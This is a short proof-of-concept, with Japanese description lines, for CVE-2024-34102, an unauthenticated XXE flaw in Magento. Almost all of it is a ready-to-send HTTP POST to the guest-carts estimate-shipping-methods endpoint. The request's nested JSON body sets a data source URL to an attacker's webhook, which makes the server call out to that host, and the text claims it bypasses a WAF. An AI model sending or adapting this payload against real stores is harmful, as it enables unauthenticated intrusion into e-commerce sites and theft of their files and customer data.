
CVE-2024-34102用の概念実証。estimate-shipping-methodsエンドポイントに細工されたリクエストを送信し、攻撃者のwebhookにHTTPコールバックを返すことで、未認証のMagento XXEとWAFバイパスを悪用します。
POC for CVE-2024-34102 : 認証不要の Magento XXE および WAF 回避、あなたの webhook に HTTP 接続が行われます
POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/2
Host: example.com
Accept: application/json, text/javascript, */*; q=0.01
Content-Length: 310
Content-Type: application/json
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
{
"address": {
"totalsCollector": {
"collectorList": {
"totalCollector": {
"sourceData": {
"data": "http://YOUR-webhook",
"dataIsURL": true,
"options": 1337
}
}
}
}
}
}